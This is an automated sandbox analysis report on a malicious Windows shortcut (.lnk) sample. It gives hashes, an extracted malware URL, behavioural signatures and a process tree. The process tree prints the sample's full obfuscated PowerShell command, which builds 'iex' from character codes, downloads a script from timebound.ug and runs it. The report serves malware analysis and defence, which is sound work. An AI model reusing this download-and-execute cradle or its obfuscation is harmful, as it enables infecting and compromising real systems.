Analysis
-
max time kernel
0s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
28-05-2024 05:10
Static task
static1
Behavioral task
behavioral1
Sample
7bcf325993d873a5dc95ac8ffb5f25eb_JaffaCakes118.lnk
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
7bcf325993d873a5dc95ac8ffb5f25eb_JaffaCakes118.lnk
Resource
win10v2004-20240426-en
General
-
Target
7bcf325993d873a5dc95ac8ffb5f25eb_JaffaCakes118.lnk
-
Size
2KB
-
MD5
7bcf325993d873a5dc95ac8ffb5f25eb
-
SHA1
d40d48977261656e9ebc98397baceb0d04539578
-
SHA256
4b269a6e40b9b7c7c8068e046c1ff815ac917699943597e8a9e512ef60cc685f
-
SHA512
c5f1ec4cb54e33d6541651531db9a771aeac817bb2ea94ee52b807984af4df029a64028c1c47d47c27611dfd3757fb144e2d0f91fda98828ddd1c7ba19593010
Malware Config
Extracted
http://timebound.ug/pps.ps1
Signatures
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation cmd.exe -
pid Process 1080 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1080 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1080 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 2604 wrote to memory of 1080 2604 cmd.exe 83 PID 2604 wrote to memory of 1080 2604 cmd.exe 83
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\7bcf325993d873a5dc95ac8ffb5f25eb_JaffaCakes118.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('http://timebound.ug/pps.ps1');s $nq2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1080 -
C:\Users\Public\enp.exe"C:\Users\Public\enp.exe"3⤵PID:4352
-
C:\Users\Public\enp.exe"C:\Users\Public\enp.exe"4⤵PID:388
-
C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe"C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe" 05⤵PID:1248
-
-
C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe"C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe" 05⤵PID:3896
-
-
C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe"C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe" 05⤵PID:2580
-
-
C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe"C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe" 05⤵PID:4824
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.3MB
MD5de08b70c1b36bce2c90a34b9e5e61f09
SHA11628635f073c61ad744d406a16d46dfac871c9c2
SHA256432747c04ab478a654328867d7ca806b52fedf1572c74712fa8b7c0edb71df67
SHA51218a30e480ce7d122cfad5a99570042e3bef9e1f9feda1f7be32b273a7248274285c65ac997c90d3d6a950a37b4ea62e6b928bfefc924187c90e32ea571bfd1f5
-
Filesize
760KB
MD58333b78c2a3eacf8cfd843a7b62ce6ba
SHA181a4d7d00d04da14a6059ed068238a7e2321f721
SHA256aaeaf69dc4dd105e8e2d637a9336af389b7c3d5175421d80fabd5c91be86b665
SHA512c3fb49362632765d2fca9855b3ea004ba3548c8d86f92d4739b28623103b93ee532a03535b43628a1a00cd96198b91f319db9b1aa7891b17d2dedaa8ff919f27